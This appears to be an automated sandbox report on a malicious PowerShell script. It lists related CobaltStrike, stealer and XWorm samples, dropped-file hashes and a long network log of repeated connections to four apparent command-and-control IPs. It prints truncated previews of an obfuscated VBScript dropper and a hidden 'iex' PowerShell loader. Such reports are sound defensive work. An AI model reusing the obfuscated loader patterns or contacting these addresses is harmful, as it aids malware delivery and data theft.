• 31#U544a.exe: malicious, CobaltStrike; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• R7bv9d6gTH.dll: malicious, Unknown; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• Patch.exe: malicious, PureLog Stealer, XWorm; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• Runtimeuserer.exe: malicious, PureLog Stealer, XWorm; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• Qsgtknmtt.exe: malicious, Unknown; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• Fzcaaz.exe: malicious, Unknown; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• Ekyrfzxogk.exe: malicious, Unknown; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
                                                                          No context
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29287
                                                                          Entropy (8bit):5.16757071229696
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                          MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                          SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                          SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                          SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                                          MD5:AADE84B9650AB09D8DC304B168D6D555
                                                                          SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                                          SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                                          SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.734735622462757
                                                                          Encrypted:false
                                                                          SSDEEP:48:ykA9VROCgmoU2f9PukvhkvklCywdgA9J22lLcSogZoCg9J22lMcSogZom1:q/OCgi4gkvhkvCCtP9J22PH49J22GHp
                                                                          MD5:987A4C5389A76B6003ADA26F9739857E
                                                                          SHA1:59956598CEB790E0B0C68AC93EA1DC88662C3077
                                                                          SHA-256:99C2600F5F990145D3C32BC05627CD908B5023A78B5B800078C23257AC8B5E9B
                                                                          SHA-512:F04B0083CE3DD1618B37F599CFD176511625657BA37648C6FDE055E43D2E3AC6232182B1F7F668402267D6481262F90FF3099CC0B4963177D88FB47827425DB2
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....N.5q....u..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...|....F.......F......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.L...........................c..A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW)N.Y.L............................'.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.L..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.L...........................h..W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.L....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.L....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.L................
                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.30523720267272
                                                                          TrID:
                                                                            File name:ap.ps1
                                                                            File size:825 bytes
                                                                            MD5:fd4a7beeefde4074f9d7c04832560ccc
                                                                            SHA1:2750778b94a0797a87f488673043db54691043b2
                                                                            SHA256:585a089fb20209a3de1a3e87799320174f90336e92c256eb4e789428f306ceee
                                                                            SHA512:b1019b295aef7ba258ad8c4f103d21ed821533666a578459d1ccd2c37b918cf8cd918b73b5e8388318e8d1e6c8979f72b4d0e9db195e371f20835c744e036eae
                                                                            SSDEEP:24:XOaOiLoOiIjWIXfYNLqwYKxhQWAa6Kzqy1zoKlRGA:+FmnjKIPdwYW8KzqyVoKl7
                                                                            TLSH:C2014645D29742F71550B54221C4463D31378E3565C604F3B5F9415B30BCB7D0CC2536
                                                                            File Content Preview:powershell -win hidden $oz30ep=iex($('[Environment]::GetEjnds'''.Replace('jnd','nvironmentVariable(''public'') + ''\\utwxgh.vb')));$flol=iex($('[Environment]::GetEjnds'''.Replace('jnd','nvironmentVariable(''public'') + ''\\sz3.vb')));function getit([strin
                                                                            Icon Hash:3270d6baae77db44
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 5, 2024 10:39:24.204157114 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:24.204204082 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:24.204309940 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:24.212845087 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:24.212882042 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:25.662364960 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:25.662435055 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:25.665817976 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:25.665831089 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:25.666110992 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:25.673240900 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:25.719331026 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.395484924 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.395509958 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.395585060 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.395621061 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.443789005 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.495650053 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.495676041 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.495753050 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.495780945 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.537559986 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.588696957 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.588713884 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.588748932 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.588788033 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.588836908 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.622114897 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.622124910 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.622195959 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.622225046 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.647461891 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.647507906 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.647552967 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.647578955 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.647598982 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.691713095 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.691724062 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.691802025 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.691817045 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.740711927 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.775782108 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.775798082 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.775834084 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.775866985 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.775914907 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.790427923 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.790447950 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.790473938 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.790505886 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.790555000 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.790570021 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.804166079 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.804177046 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.804266930 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.804307938 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.822531939 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.822544098 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.822566986 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.822597980 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.822653055 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.822670937 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.836256027 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.836272001 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.836337090 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.836383104 CET  443          49728      93.95.216.175    192.168.2.10
Dec 5, 2024 10:39:26.836402893 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:26.850991964 CET  49728        443        192.168.2.10     93.95.216.175
Dec 5, 2024 10:39:27.298813105 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:27.298856974 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:27.298929930 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:27.299273014 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:27.299285889 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:28.563709021 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:28.563767910 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:28.565500021 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:28.565558910 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:28.565817118 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:28.566786051 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:28.607335091 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.015261889 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.068785906 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.068809032 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.115669012 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.135026932 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.135041952 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.135073900 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.135086060 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.135102987 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.135109901 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.135154963 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.135162115 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.178173065 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.241986990 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.241997004 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.242038965 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.242057085 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.242058039 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.242085934 CET  443          49741      91.193.42.13     192.168.2.10
Dec 5, 2024 10:39:29.242089987 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.242108107 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.242131948 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:29.243098021 CET  49741        443        192.168.2.10     91.193.42.13
Dec 5, 2024 10:39:31.348669052 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:31.348731995 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:31.348800898 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:31.352113962 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:31.352133036 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:32.618984938 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:32.619072914 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:32.621857882 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:32.621867895 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:32.622222900 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:32.628407001 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:32.675335884 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:33.072896957 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:33.073005915 CET  443          49754      184.171.244.231  192.168.2.10
Dec 5, 2024 10:39:33.073291063 CET  49754        443        192.168.2.10     184.171.244.231
Dec 5, 2024 10:39:33.122632027 CET  49754        443        192.168.2.10     184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445594072 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445658922 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:37.445729017 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445940018 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445957899 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:38.898121119 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:38.899344921 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:38.899390936 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457071066 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457144022 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457206964 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:39.489562035 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:43.877756119 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.877800941 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:43.877934933 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.878205061 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.878221989 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.281986952 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.282113075 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.283813953 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.283823967 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.284164906 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.285386086 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.331326008 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.816879988 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.817043066 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.817248106 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.817928076 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:49.837507010 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837544918 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:49.837673903 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837853909 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837862015 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.099077940 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.100222111 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:51.100229979 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559261084 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559328079 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559391975 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:51.559808016 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:55.556087971 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556135893 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:55.556216955 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556452990 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556463957 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:56.963556051 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:56.966474056 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:56.966505051 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506086111 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506289005 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506663084 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:57.507050991 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:01.509810925 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.509859085 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:01.509946108 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.510163069 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.510174036 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:02.770351887 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:02.771545887 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:02.771576881 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.229753017 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.229837894 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.230104923 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:03.230242014 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:07.264461994 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264503956 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:07.264576912 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264911890 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264931917 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:08.665762901 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:08.666784048 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:08.666795969 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213222027 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213406086 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213479042 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:09.213911057 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:13.212879896 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.212938070 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:13.213023901 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.213244915 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.213255882 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.474863052 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.495172977 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:14.495213985 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936309099 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936382055 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936446905 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:14.936985970 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:18.947104931 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947170973 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:18.947280884 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947531939 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947546959 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.345973969 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.347219944 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:20.347248077 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891455889 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891720057 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891890049 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:20.892365932 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:24.931499958 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931540966 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:24.931632996 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931859970 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931874990 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.193947077 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.195274115 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:26.195297003 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.658943892 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.659003973 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.659077883 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:26.659545898 CET49885443192.168.2.10184.171.244.231
